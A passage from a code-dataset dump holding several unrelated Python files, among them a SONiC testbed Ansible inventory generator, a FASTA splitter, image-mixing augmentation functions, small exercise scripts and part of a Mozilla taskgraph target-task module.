yaml.dump(result, stream=toWrite, default_flow_style=False)\n\n\"\"\"\nmakeSonicLabDevices(data, outfile)\n@:parameter data - the dictionary to look through (devices dictionary)\n@:parameter outfile - the file to write to\ngenerates files/sonic_lab_devices.csv by pulling hostname, managementIP, hwsku, and type\nerror handling: checks if attribute values are None type or string \"None\"\n\"\"\"\ndef makeSonicLabDevices(data, outfile):\n csv_columns = \"Hostname,ManagementIp,HwSku,Type\"\n topology = data\n csv_file = outfile\n\n try:\n with open(csv_file, \"w\") as f:\n f.write(csv_columns + \"\\n\")\n for device, deviceDetails in topology.items():\n hostname = device\n managementIP = str(deviceDetails.get(\"ansible\").get(\"ansible_host\"))\n hwsku = deviceDetails.get(\"hwsku\")\n devType = deviceDetails.get(\"device_type\")\n\n # catch empty values\n if not managementIP:\n managementIP = \"\"\n if not hwsku:\n hwsku = \"\"\n if not devType:\n devType = \"\"\n\n row = hostname + \",\" + managementIP + \",\" + hwsku + \",\" + devType\n f.write(row + \"\\n\")\n except IOError:\n print(\"I/O error: makeSonicLabDevices\")\n\n\n\"\"\"\nmakeTestbed(data, outfile)\n@:parameter data - the dictionary to look through (devices dictionary)\n@:parameter outfile - the file to write to\ngenerates /testbed.csv by pulling confName, groupName, topo, ptf_image_name, ptf_ip, ptf_ipv6, server, vm_base, dut, and comment\nerror handling: checks if attribute values are None type or string \"None\"\n\"\"\"\ndef makeTestbed(data, outfile):\n csv_columns = \"# conf-name,group-name,topo,ptf_image_name,ptf,ptf_ip,ptf_ipv6,server,vm_base,dut,comment\"\n topology = data\n csv_file = outfile\n\n try:\n with open(csv_file, \"w\") as f:\n f.write(csv_columns + \"\\n\")\n for group, groupDetails in topology.items():\n confName = group\n groupName = groupDetails.get(\"group-name\")\n topo = groupDetails.get(\"topo\")\n ptf_image_name = groupDetails.get(\"ptf_image_name\")\n ptf_ip = groupDetails.get(\"ptf_ip\")\n ptf_ipv6 = groupDetails.get(\"ptf_ipv6\")\n server = groupDetails.get(\"server\")\n vm_base = groupDetails.get(\"vm_base\")\n dut = groupDetails.get(\"dut\")\n ptf = groupDetails.get(\"ptf\")\n comment = groupDetails.get(\"comment\")\n\n # catch empty types\n if not groupName:\n groupName = \"\"\n if not topo:\n topo = \"\"\n if not ptf_image_name:\n ptf_image_name = \"\"\n if not ptf_ip:\n ptf_ip = \"\"\n if not ptf_ipv6:\n ptf_ipv6 = \"\"\n if not server:\n server = \"\"\n if not vm_base:\n vm_base = \"\"\n if not dut:\n dut = \"\"\n if not ptf:\n ptf = \"\"\n if not comment:\n comment = \"\"\n\n row = confName + \",\" + groupName + \",\" + topo + \",\" + ptf_image_name + \",\" + ptf + \",\" + ptf_ip + \",\" + ptf_ipv6 + \",\"+ server + \",\" + vm_base + \",\" + dut + \",\" + comment\n f.write(row + \"\\n\")\n except IOError:\n print(\"I/O error: issue creating testbed.csv\")\n\n\n\"\"\"\nmakeSonicLabLinks(data, outfile)\n@:parameter data - the dictionary to look through (devices dictionary)\n@:parameter outfile - the file to write to\ngenerates /files/sonic_lab_links.csv by pulling startPort, endPort, bandWidth, vlanID, vlanMode\nerror handling: checks if attribute values are None type or string \"None\"\n\"\"\"\ndef makeSonicLabLinks(data, outfile):\n csv_columns = \"StartDevice,StartPort,EndDevice,EndPort,BandWidth,VlanID,VlanMode\"\n topology = data\n csv_file = outfile\n\n try:\n with open(csv_file, \"w\") as f:\n f.write(csv_columns + \"\\n\")\n for key, item in topology.items():\n startDevice = key\n interfacesDetails = item.get(\"interfaces\")\n\n for startPort, element in interfacesDetails.items():\n startPort = startPort\n endDevice = element.get(\"EndDevice\")\n endPort = element.get(\"EndPort\")\n bandWidth = element.get(\"Bandwidth\")\n vlanID = element.get(\"VlanID\")\n vlanMode = element.get(\"VlanMode\")\n\n # catch empty values\n if not endDevice:\n endDevice = \"\"\n if not endPort:\n endPort = \"\"\n if not bandWidth:\n bandWidth = \"\"\n if not vlanID:\n vlanID = \"\"\n if not vlanMode:\n vlanMode = \"\"\n\n row = startDevice + \",\" + startPort + \",\" + endDevice + \",\" + endPort + \",\" + str(bandWidth) + \",\" + str(vlanID) + \",\" + vlanMode\n f.write(row + \"\\n\")\n except IOError:\n print(\"I/O error: issue creating sonic_lab_links.csv\")\n\n\n\"\"\"\nmakeEOS_creds(data, outfile)\n@:parameter data - the dictionary to look through\n@:parameter outfile - the file to write to\nGenerate /group_vars/eos/creds.yml\nWorks by looking through veos dictionary and pulling ansible_user and ansible_password under eos_ansible\n\"\"\"\ndef makeEOSCreds(data, outfile):\n veos = data\n result = {\n \"ansible_user\": veos.get(\"eos_ansible\").get(\"ansible_user\"),\n \"ansible_password\": veos.get(\"eos_ansible\").get(\"ansible_password\")\n }\n with open(outfile, \"w\") as toWrite:\n toWrite.write(\"---\\n\")\n yaml.dump(result, stream=toWrite, default_flow_style=False)\n\n\n\"\"\"\nmakeFanout_secrets(data, outfile)\n@:parameter data - reads from devices dictionary\n@:parameter outfile - the file to write to\nMakes /group_vars/fanout/secrets.yml\nFinds the fanout secret credentials by using \"fanout\" as the value to search for under device_type\nUnder github and personal topology configuration, there is only one designated fanout switch credential\n\"\"\"\ndef makeFanoutSecrets(data, outfile):\n devices = data\n result = dict()\n\n for key, value in devices.items():\n if \"fanout\" in value.get(\"device_type\").lower():\n result.update({\"ansible_ssh_user\": value.get(\"ansible\").get(\"ansible_ssh_user\")})\n result.update({\"ansible_ssh_pass\": value.get(\"ansible\").get(\"ansible_ssh_pass\")})\n\n with open(outfile, \"w\") as toWrite:\n yaml.dump(result, stream=toWrite, default_flow_style=False)\n\n\n\"\"\"\nmakeLab_secrets(data, outfile)\n@:parameter data - reads from devices dictionary\n@:parameter outfile - the file to write to\nMakes /group_vars/lab/secrets.yml\nFinds the lab device to generate the secret.yml file using \"server\" as the value to search for under device_type\nUnder github and personal topology configuration, there is only one designated lab server\n\"\"\"\ndef makeLabSecrets(data, outfile):\n devices = data\n result = dict()\n\n for key, value in devices.items():\n if \"server\" in value.get(\"device_type\").lower():\n result.update({\"ansible_ssh_pass\": value.get(\"ansible\").get(\"ansible_ssh_pass\")})\n result.update({\"ansible_become_pass\": value.get(\"ansible\").get(\"ansible_become_pass\")})\n result.update({\"sonicadmin_user\": value.get(\"ansible\").get(\"sonicadmin_user\")})\n result.update({\"sonicadmin_password\": value.get(\"ansible\").get(\"sonicadmin_password\")})\n result.update({\"sonicadmin_initial_password\": value.get(\"ansible\").get(\"sonicadmin_initial_password\")})\n\n with open(outfile, \"w\") as toWrite:\n yaml.dump(result, stream=toWrite, default_flow_style=False)\n\n\"\"\"\nmakeLab(data, veos, devices, outfile)\n@:parameter data - reads from devices-groups, this helps separate the function into 3 components; children, host, vars\n@:parameter devices - reads from devices\n@:parameter testbed - reads from testbed (to accomodate for PTF container(s))\n@:parameter outfile - writes to lab\n\"\"\"\ndef makeLab(data, devices, testbed, outfile):\n deviceGroup = data\n with open(outfile, \"w\") as toWrite:\n for key, value in deviceGroup.items():\n #children section\n if \"children\" in value:\n toWrite.write(\"[\" + key + \":children]\\n\")\n for child in value.get(\"children\"):\n toWrite.write(child + \"\\n\")\n toWrite.write(\"\\n\")\n\n #host section\n if \"host\" in value:\n toWrite.write(\"[\" + key + \"]\\n\")\n for host in value.get(\"host\"):\n entry = host\n\n if \"ptf\" in key:\n try: #get ansible host\n ansible_host = testbed.get(host).get(\"ansible\").get(\"ansible_host\")\n entry += \"\\tansible_host=\" + ansible_host.split(\"/\")[0]\n except:\n print(\"\\t\\t\" + host + \": ansible_host not found\")\n\n if ansible_host:\n try: # get ansible ssh username\n ansible_ssh_user = testbed.get(host.lower()).get(\"ansible\").get(\"ansible_ssh_user\")\n entry += \"\\tansible_ssh_user=\" + ansible_ssh_user\n except:\n print(\"\\t\\t\" + host + \": ansible_ssh_user not found\")\n\n try: # get ansible ssh pass\n ansible_ssh_pass = testbed.get(host.lower()).get(\"ansible\").get(\"ansible_ssh_pass\")\n entry += \"\\tansible_ssh_pass=\" + ansible_ssh_pass\n except:\n print(\"\\t\\t\" + host + \": ansible_ssh_pass not found\")\n else: #not ptf container\n try: #get ansible host\n ansible_host = devices.get(host.lower()).get(\"ansible\").get(\"ansible_host\")\n entry += \"\\tansible_host=\" + ansible_host.split(\"/\")[0]\n except:\n print(\"\\t\\t\" + host + \": ansible_host not found\")\n\n if ansible_host:\n try: # get ansible ssh username\n ansible_ssh_user = devices.get(host.lower()).get(\"ansible\").get(\"ansible_ssh_user\")\n entry += \"\\tansible_ssh_user=\" + ansible_ssh_user\n except:\n print(\"\\t\\t\" + host + \": ansible_ssh_user not found\")\n\n try: # get ansible ssh pass\n ansible_ssh_pass = devices.get(host.lower()).get(\"ansible\").get(\"ansible_ssh_pass\")\n entry += \"\\tansible_ssh_pass=\" + ansible_ssh_pass\n except:\n print(\"\\t\\t\" + host + \": ansible_ssh_pass not found\")\n\n toWrite.write(entry + \"\\n\")\n toWrite.write(\"\\n\")\n\n #vars section\n if \"vars\" in value:\n toWrite.write(\"[\" + key + \":vars]\\n\")\n for key2, val2 in value.get(\"vars\").items():\n if isinstance(val2, list) or isinstance(val2, dict):\n toWrite.write(key2 + \"=[\" + ', '.join(val2) + \"]\\n\")\n else:\n toWrite.write(key2 + \"=\" + val2 + \"\\n\")\n toWrite.write(\"\\n\")\n\n\"\"\"\nmakeVeos(data, veos, devices, outfile)\n@:parameter data - reads from either veos-groups, this helps separate the function into 3 components; children, host, vars\n@:parameter veos - reads from either veos\n@:parameter devices - reads from devices\n@:parameter outfile - writes to veos\n\"\"\"\ndef makeVeos(data, veos, devices, outfile):\n group = data\n with open(outfile, \"w\") as toWrite:\n for key, value in group.items():\n # children section\n if \"children\" in value:\n toWrite.write(\"[\" + key + \":children]\\n\")\n for child in value.get(\"children\"):\n toWrite.write(child + \"\\n\")\n toWrite.write(\"\\n\")\n\n # host section\n if \"host\" in value:\n toWrite.write(\"[\" + key + \"]\\n\")\n for host in value.get(\"host\"):\n entry = host\n\n try:\n ansible_host = devices.get(host.lower()).get(\"ansible\").get(\"ansible_host\")\n entry += \"\\tansible_host=\" + ansible_host.split(\"/\")[0]\n except:\n try:\n ansible_host = veos.get(key).get(host).get(\"ansible_host\")\n entry += \"\\tansible_host=\" + ansible_host.split(\"/\")[0]\n except:\n print(\"\\t\\t\" + host + \": ansible_host not found\")\n toWrite.write(entry + \"\\n\")\n\n toWrite.write(\"\\n\")\n\n #var section\n if \"vars\" in value:\n toWrite.write(\"[\" + key + \":vars]\\n\")\n for key2, val2 in value.get(\"vars\").items():\n if isinstance(val2, list) or isinstance(val2, dict):\n toWrite.write(key2 + \"=[\" + ', '.join(val2) + \"]\\n\")\n else:\n toWrite.write(key2 + \"=\" + val2 + \"\\n\")\n toWrite.write(\"\\n\")\n\n\n\"\"\"\nmakeHost_var(data)\n@:parameter data - reads from host_vars dictionary\nCreates host variable files for each device\n\"\"\"\ndef makeHostVar(data):\n host_vars = data\n for key, value in host_vars.items(): # iterate through all devices in host_vars dictionary\n with open(args.basedir + \"host_vars/\" + key.upper() + \".yml\", \"w\") as toWrite: # create (or overwrite) a file named .yml\n for attribute, attribute_data in value.items(): # for each element in device's dictionary\n toWrite.write(str(attribute) + \": \" + str(attribute_data) + \"\\n\") # write the attribute and the attribute value to .yml\n\n\"\"\"\nupdateDockerRegistry\n@:parameter outfile - the file to write to\nhard codes the docker registry to search locally rather than externally\n\"\"\"\ndef updateDockerRegistry(docker_registry, outfile):\n if not docker_registry.get(\"docker_registry_host\"):\n print(\"\\t\\tREGISTRY FIELD BLANK - SKIPPING THIS STEP\")\n else:\n with open(outfile, \"w\") as toWrite:\n toWrite.write(\"docker_registry_host: \" + docker_registry.get(\"docker_registry_host\"))\n toWrite.write(\"\\n\\n\")\n\n\ndef main():\n print(\"PROCESS STARTED\")\n ##############################################################\n print(\"BACKUP PROCESS STARTED\") # Backup data\n for file in backupList:\n try:\n copyfile(args.basedir + file, args.backupdir + \"/\" + timestamp + \"/\" + file)\n except IOError: # filenotfound\n print(\"Error: could not back up \" + args.basedir + file)\n\n host_var_files = os.listdir(args.basedir + \"host_vars\")\n for file_name in host_var_files:\n copyfile(args.basedir + \"host_vars/\" + file_name,\n args.backupdir + \"/\" + timestamp + \"/host_vars/\" + file_name)\n\n print(\"BACKUP PROCESS COMPLETED\")\n\n ##############################################################\n # Load Data\n print(\"LOADING PROCESS STARTED\")\n print(\"LOADING: \" + args.i)\n doc = yaml.load(open(args.i, 'r'))\n devices = dict() # dictionary contains information about devices\n generateDictionary(doc, devices, \"devices\") # load devices\n veos = dict() # dictionary contains information about veos\n generateDictionary(doc, veos, \"veos\") # load veos\n testbed = dict() # dictionary contains information about testbed (ptf)\n generateDictionary(doc, testbed, \"testbed\") # load testbed\n topology = dict() # dictionary contains information about toplogy\n generateDictionary(doc, topology, \"topology\") # load topology\n host_vars = dict() # dictionary contains information about host_vars\n generateDictionary(doc, host_vars, \"host_vars\") # load host_vars\n veos_groups = dict() # dictionary contains information about veos_groups\n generateDictionary(doc, veos_groups, \"veos_groups\") # load veos_groups\n device_groups = dict() # dictionary contains information about device_groups\n generateDictionary(doc, device_groups, \"device_groups\") # load device_groups\n docker_registry = dict() # dictionary contains information about docker_registry\n generateDictionary(doc, docker_registry, \"docker_registry\") #load docker_registry\n print(\"LOADING PROCESS COMPLETED\")\n\n ##############################################################\n # Generate files\n print(\"GENERATING FILES FROM CONFIG FILE\")\n print(\"\\tCREATING SONIC LAB LINKS: \" + args.basedir + labLinks_file)\n makeSonicLabLinks(topology, args.basedir + labLinks_file) # Generate sonic_lab_links.csv (TOPOLOGY)\n print(\"\\tCREATING SONIC LAB DEVICES: \" + args.basedir + devices_file)\n makeSonicLabDevices(devices, args.basedir + devices_file) # Generate sonic_lab_devices.csv (DEVICES)\n print(\"\\tCREATING TEST BED: \" + args.basedir + testbed_file)\n makeTestbed(testbed, args.basedir + testbed_file) # Generate testbed.csv (TESTBED)\n print(\"\\tCREATING VM_HOST/CREDS: \" + args.basedir + vmHostCreds_file)\n makeVMHostCreds(veos, args.basedir + vmHostCreds_file) # Generate vm_host\\creds.yml (CREDS)\n print(\"\\tCREATING EOS/CREDS: \" + args.basedir + eosCred_file)\n makeEOSCreds(veos, args.basedir + eosCred_file) # Generate eos\\creds.yml (CREDS)\n print(\"\\tCREATING FANOUT/SECRETS: \" + args.basedir + fanoutSecrets_file)\n makeFanoutSecrets(devices, args.basedir + fanoutSecrets_file) # Generate fanout\\secrets.yml (SECRETS)\n print(\"\\tCREATING LAB SECRETS: \" + args.basedir + labSecrets_file)\n makeLabSecrets(devices, args.basedir + labSecrets_file) # Generate lab\\secrets.yml (SECRETS)\n print(\"\\tCREATING MAIN.YML: \" + args.basedir + main_file)\n makeMain(veos, args.basedir + main_file) # Generate main.yml (MAIN)\n print(\"\\tCREATING LAB FILE: \" + args.basedir + lab_file)\n makeLab(device_groups, devices, testbed, args.basedir + lab_file) # Generate lab (LAB)\n print(\"\\tCREATING VEOS FILE: \" + args.basedir + veos_file)\n makeVeos(veos_groups, veos, devices, args.basedir + veos_file) # Generate veos (VEOS)\n print(\"\\tCREATING HOST VARS FILE(S): one or more files generated\")\n makeHostVar(host_vars) # Generate host_vars (HOST_VARS)\n print(\"UPDATING FILES FROM CONFIG FILE\")\n print(\"\\tUPDATING DOCKER REGISTRY\")\n updateDockerRegistry(docker_registry, args.basedir + dockerRegistry_file)\n print(\"PROCESS COMPLETED\")\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"hwiewie/ansible","sub_path":"TestbedProcessing.py","file_name":"TestbedProcessing.py","file_ext":"py","file_size_in_byte":26079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"28910185011","text":"#!/usr/bin/python\nimport sys\n\nif len(sys.argv) == 3:\n input_file = sys.argv[1]\n outdir = sys.argv[2]\nelse:\n print(\"usage: ./split.py input_file outdir\")\n sys.exit(1)\n\n#parse input query\ninput = open(input_file)\nqueries = []\nquery = \"\"\nname = \"\"\nfor line in input.readlines():\n if line[0] == \">\":\n if name != \"\":\n queries.append([name, query])\n name = line\n query = \"\"\n else:\n query += line\nif name != \"\":\n queries.append([name, query])\ninput.close()\n\n#output each files\nblock = {}\ncount = 0\nfor query in queries:\n outfile = open(\"%s/%07d.fasta\" % (outdir, count), \"w\")\n outfile.write(query[1])\n outfile.close()\n count+=1\n","repo_name":"pegasus-isi/BLAST-Workflow","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"70343805030","text":"import numpy as np\r\nimport torch\r\nfrom utils import rand_box\r\nimport torch.nn.functional as F\r\n\r\ndef mixup(images, labels, alpha=0.4, gpu=True):\r\n lam = np.random.beta(alpha, alpha)\r\n\r\n batch_size = images.size()[0]\r\n if gpu:\r\n indices = torch.randperm(batch_size).cuda()\r\n else:\r\n indices = torch.randperm(batch_size)\r\n\r\n mixed_images = lam*images + (1 - lam)*images[indices, :]\r\n\r\n return mixed_images, labels, labels[indices], lam\r\n\r\ndef cutmix(images, labels, alpha=0.4, gpu=True):\r\n lam = np.random.beta(alpha, alpha)\r\n\r\n batch_size = images.size()[0]\r\n if gpu:\r\n indices = torch.randperm(batch_size).cuda()\r\n else:\r\n indices = torch.randperm(batch_size)\r\n\r\n bbx1, bby1, bbx2, bby2 = rand_box(images.size()[2], images.size()[3], lam)\r\n images[:, :, bbx1:bbx2, bby1:bby2] = images[indices, :, bbx1:bbx2, bby1:bby2]\r\n\r\n lam = 1 - ((bbx2 - bbx1)*(bby2 - bby1) / (images.size()[2]*images.size()[3]))\r\n\r\n return images, labels, labels[indices], lam\r\n\r\ndef rand_bbox(size, lam):\r\n W = size[2]\r\n H = size[3]\r\n cut_rat = np.sqrt(1. - lam)\r\n cut_w = np.int(W * cut_rat)\r\n cut_h = np.int(H * cut_rat)\r\n\r\n # uniform\r\n cx = np.random.randint(W)\r\n cy = np.random.randint(H)\r\n\r\n bbx1 = np.clip(cx - cut_w // 2, 0, W)\r\n bby1 = np.clip(cy - cut_h // 2, 0, H)\r\n bbx2 = np.clip(cx + cut_w // 2, 0, W)\r\n bby2 = np.clip(cy + cut_h // 2, 0, H)\r\n\r\n return bbx1, bby1, bbx2, bby2\r\n\r\ndef get_spm(input,target,model):\r\n imgsize = (512, 512)\r\n bs = input.size(0)\r\n with torch.no_grad():\r\n output,fms = model(input)\r\n clsw = model.module.classifier\r\n weight = clsw.weight.data\r\n bias = clsw.bias.data\r\n weight = weight.view(weight.size(0),weight.size(1),1,1)\r\n fms = F.relu(fms)\r\n poolfea = F.adaptive_avg_pool2d(fms,(1,1)).squeeze()\r\n clslogit = F.softmax(clsw.forward(poolfea))\r\n #logit_numpy = clslogit.cpu().detach().numpy()\r\n target_numpy = target.cpu().detach().numpy()\r\n #print(logit_numpy)\r\n logitlist = []\r\n for i in range(bs):\r\n #print(i, target_numpy[i])\r\n logitlist.append(clslogit[i, int(target_numpy[i])])\r\n clslogit = torch.stack(logitlist)\r\n\r\n out = F.conv2d(fms, weight, bias=bias)\r\n\r\n outmaps = []\r\n for i in range(bs):\r\n evimap = out[i,int(target_numpy[i])]\r\n outmaps.append(evimap)\r\n\r\n outmaps = torch.stack(outmaps)\r\n if imgsize is not None:\r\n outmaps = outmaps.view(outmaps.size(0),1,outmaps.size(1),outmaps.size(2))\r\n outmaps = F.interpolate(outmaps,imgsize,mode='bilinear',align_corners=False)\r\n\r\n outmaps = outmaps.squeeze()\r\n\r\n for i in range(bs):\r\n outmaps[i] -= outmaps[i].min()\r\n outmaps[i] /= outmaps[i].sum()\r\n\r\n\r\n return outmaps,clslogit\r\n\r\ndef snapmix(input, target, alpha, model=None):\r\n r = np.random.rand(1)\r\n lam_a = torch.ones(input.size(0))\r\n lam_b = 1 - lam_a\r\n target_b = target.clone()\r\n\r\n if True:\r\n wfmaps,_ = get_spm(input, target, model)\r\n bs = input.size(0)\r\n lam = np.random.beta(alpha, alpha)\r\n lam1 = np.random.beta(alpha, alpha)\r\n rand_index = torch.randperm(bs).cuda()\r\n wfmaps_b = wfmaps[rand_index,:,:]\r\n target_b = target[rand_index]\r\n\r\n same_label = target == target_b\r\n bbx1, bby1, bbx2, bby2 = rand_bbox(input.size(), lam)\r\n bbx1_1, bby1_1, bbx2_1, bby2_1 = rand_bbox(input.size(), lam1)\r\n\r\n area = (bby2-bby1)*(bbx2-bbx1)\r\n area1 = (bby2_1-bby1_1)*(bbx2_1-bbx1_1)\r\n\r\n if area1 > 0 and area>0:\r\n ncont = input[rand_index, :, bbx1_1:bbx2_1, bby1_1:bby2_1].clone()\r\n ncont = F.interpolate(ncont, size=(bbx2-bbx1,bby2-bby1), mode='bilinear', align_corners=True)\r\n input[:, :, bbx1:bbx2, bby1:bby2] = ncont\r\n lam_a = 1 - wfmaps[:,bbx1:bbx2,bby1:bby2].sum(2).sum(1)/(wfmaps.sum(2).sum(1)+1e-8)\r\n lam_b = wfmaps_b[:,bbx1_1:bbx2_1,bby1_1:bby2_1].sum(2).sum(1)/(wfmaps_b.sum(2).sum(1)+1e-8)\r\n tmp = lam_a.clone()\r\n lam_a[same_label] += lam_b[same_label]\r\n lam_b[same_label] += tmp[same_label]\r\n lam = 1 - ((bbx2 - bbx1) * (bby2 - bby1) / (input.size()[-1] * input.size()[-2]))\r\n lam_a[torch.isnan(lam_a)] = lam\r\n lam_b[torch.isnan(lam_b)] = 1-lam\r\n\r\n return input,target,target_b,lam_a.cuda(),lam_b.cuda()","repo_name":"freedom1810/kaggle-cassava","sub_path":"engine/augments.py","file_name":"augments.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"71"} +{"seq_id":"24583443843","text":"class Solution:\n def convertTime(self, current: str, correct: str) -> int:\n if current == correct:\n return 0\n \n cur_hour, cur_min = map(lambda x: int(x), current.split(\":\"))\n cor_hour, cor_min = map(lambda x: int(x), correct.split(\":\"))\n operations = [15, 5, 1]\n res = 0\n if cur_min > cor_min:\n minute_diff = (60 - cur_min) + cor_min\n cur_hour += 1\n else:\n minute_diff = cor_min - cur_min\n \n for op in operations:\n num_ops, minute_diff = divmod(minute_diff, op)\n res += num_ops\n\n if cur_hour > cor_hour:\n res += (24 - cur_hour) + cor_hour\n else:\n res += cor_hour - cur_hour\n\n return res\n \n\ndef main():\n sol = Solution()\n print(sol.convertTime(current = \"02:30\", correct = \"04:35\"))\n print(sol.convertTime(current = \"11:00\", correct = \"11:01\"))\n\nif __name__ == '__main__':\n main()","repo_name":"brandoneng000/LeetCode","sub_path":"easy/2224.py","file_name":"2224.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72849151909","text":"l = ['Thiru - velchry','Thiru - porur','Thiru - roya','Thiru - koyam']\r\nv = ['Bike','Auto','Mini','Micro','Prime']\r\nfor a,b in enumerate(l,1):\r\n print(a,b)\r\nwhile True:\r\n loc = int(input('Enter the number of your selection :'))\r\n if loc>0 and loc<=len(l):\r\n break\r\n else:\r\n print('Selection Invalid')\r\nfor a,b in enumerate(v,1):\r\n print(a,b)\r\nwhile True:\r\n veh = int(input('Enter the number of your selection :'))\r\n if veh>0 and veh<=len(v):\r\n break\r\n else:\r\n print('Selection Invalid')\r\ncos = loc*100+veh*10\r\nprint('The cost is :Rs.',cos)\r\n","repo_name":"DeonysDavidson/python-projects","sub_path":"UberBilling.py","file_name":"UberBilling.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13924797568","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 12 20:50:59 2021\r\n\r\n@author: 皮皮卡卡\r\n\"\"\"\r\nimport openpyxl as pyxl\r\nfrom openpyxl.utils import get_column_letter, column_index_from_string #translate column letter or number \r\n\r\nwb = pyxl.load_workbook('example.xlsx') #到這邊都必要的\r\nsheet = wb['sheet1'] #get a cell form the sheet\r\nsheet = wb.active #the sheet which you first get when you open excel.\r\nfor i in range(1, 8, 2):\r\n print(i, sheet.cell(row=i, column=2).value)\r\n\r\nprint(sheet.max_column)\r\n'''\r\nwe can get letter of colume and number translating\r\n'''\r\n\r\nprint(get_column_letter(900))\r\nprint(column_index_from_string('A'))\r\n'''\r\nwe can use the 'slice' to get specific data from a rectangle range in excel.\r\n'''\r\n\r\nfor rowcellobject in sheet['B1':'B7']:\r\n for obj in rowcellobject:\r\n print(obj.coordinate, obj.value) #是一個正方形,從A1到C3,當然也可以是一格的長方形(單行)\r\n \r\n \r\n \r\n \r\n","repo_name":"pikaiscoming/python_learning","sub_path":"Day_21_excel.py","file_name":"Day_21_excel.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"20738723766","text":"# -*- coding: utf-8 -*-\n\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport os\nimport json\n\nfrom taskgraph import try_option_syntax\nfrom taskgraph.util.attributes import match_run_on_projects\n\n_target_task_methods = {}\n\n\ndef _target_task(name):\n def wrap(func):\n _target_task_methods[name] = func\n return func\n return wrap\n\n\ndef get_method(method):\n \"\"\"Get a target_task_method to pass to a TaskGraphGenerator.\"\"\"\n return _target_task_methods[method]\n\n\ndef filter_on_nightly(task, parameters):\n return not task.attributes.get('nightly') or parameters.get('include_nightly')\n\n\ndef filter_for_project(task, parameters):\n \"\"\"Filter tasks by project. Optionally enable nightlies.\"\"\"\n run_on_projects = set(task.attributes.get('run_on_projects', []))\n return match_run_on_projects(parameters['project'], run_on_projects)\n\n\ndef filter_upload_symbols(task, parameters):\n # Filters out symbols when there are not part of a nightly or a release build\n # TODO Remove this too specific filter (bug 1353296)\n return '-upload-symbols' not in task.label or \\\n task.attributes.get('nightly') or \\\n parameters.get('project') in ('mozilla-beta', 'mozilla-release')\n\n\ndef standard_filter(task, parameters):\n return all(\n filter_func(task, parameters) for filter_func in\n (filter_on_nightly, filter_for_project, filter_upload_symbols)\n )\n\n\ndef _try_task_config(full_task_graph, parameters):\n task_config_file = os.path.join(os.getcwd(), 'try_task_config.json')\n\n if not os.path.isfile(task_config_file):\n return []\n\n with open(task_config_file, 'r') as fh:\n task_config = json.load(fh)\n\n target_task_labels = []\n for task in full_task_graph.tasks.itervalues():\n if task.label in task_config:\n target_task_labels.append(task.label)\n\n return target_task_labels\n\n\ndef _try_option_syntax(full_task_graph, parameters):\n \"\"\"Generate a list of target tasks based on try syntax in\n parameters['message'] and, for context, the full task graph.\"\"\"\n options = try_option_syntax.TryOptionSyntax(parameters['message'], full_task_graph)\n target_tasks_labels = [t.label for t in full_task_graph.tasks.itervalues()\n if options.task_matches(t)]\n\n attributes = {\n k: getattr(options, k) for k in [\n 'env',\n 'no_retry',\n 'tag',\n ]\n }\n\n for l in target_tasks_labels:\n task = full_task_graph[l]\n if 'unittest_suite' in task.attributes:\n task.attributes['task_duplicates'] = options.trigger_tests\n\n for l in target_tasks_labels:\n task = full_task_graph[l]\n # If the developer wants test jobs to be rebuilt N times we add that value here\n if options.trigger_tests > 1 and 'unittest_suite' in task.attributes:\n task.attributes['task_duplicates'] = options.trigger_tests\n task.attributes['profile'] = False\n\n # If the developer wants test talos jobs to be rebuilt N times we add that value here\n if options.talos_trigger_tests > 1 and task.attributes.get('unittest_suite') == 'talos':\n task.attributes['task_duplicates'] = options.talos_trigger_tests\n task.attributes['profile'] = options.profile\n\n task.attributes.update(attributes)\n\n # Add notifications here as well\n if options.notifications:\n for task in full_task_graph:\n owner = parameters.get('owner')\n routes = task.task.setdefault('routes', [])\n if options.notifications == 'all':\n routes.append(\"notify.email.{}.on-any\".format(owner))\n elif options.notifications == 'failure':\n routes.append(\"notify.email.{}.on-failed\".format(owner))\n routes.append(\"notify.email.{}.on-exception\".format(owner))\n\n return target_tasks_labels\n\n\n@_target_task('try_tasks')\ndef target_tasks_try(full_task_graph, parameters):\n labels = _try_task_config(full_task_graph, parameters)\n\n if 'try:' in parameters['message'] or not labels:\n labels.extend(_try_option_syntax(full_task_graph, parameters))\n\n return labels\n\n\n@_target_task('default')\ndef target_tasks_default(full_task_graph, parameters):\n \"\"\"Target the tasks which have indicated they should be run on this project\n via the `run_on_projects` attributes.\"\"\"\n\n return [l for l, t in full_task_graph.tasks.iteritems()\n if standard_filter(t, parameters)]\n\n\n@_target_task('ash_tasks')\ndef target_tasks_ash(full_task_graph, parameters):\n \"\"\"Target tasks that only run on the ash branch.\"\"\"\n def filter(task):\n platform = task.attributes.get('build_platform')\n # Early return if platform is None\n if not platform:\n return False\n # Only on Linux platforms\n if 'linux' not in platform:\n return False\n # No random non-build jobs either. This is being purposely done as a\n # blacklist so newly-added jobs aren't missed by default.\n for p in ('nightly', 'haz', 'artifact', 'cov', 'add-on'):\n if p in platform:\n return False\n for k in ('toolchain', 'l10n', 'static-analysis'):\n if k in task.attributes['kind']:\n return False\n # and none of this linux64-asan/debug stuff\n if platform == 'linux64-asan' and task.attributes['build_type'] == 'debug':\n return False\n # no non-e10s tests\n if task.attributes.get('unittest_suite'):\n if not task.attributes.get('e10s'):\n return False\n # don't run talos on ash\n if task.attributes.get('unittest_suite') == 'talos':\n return False\n # don't upload symbols\n if task.attributes['kind'] == 'upload-symbols':\n return False\n return True\n return [l for l, t in 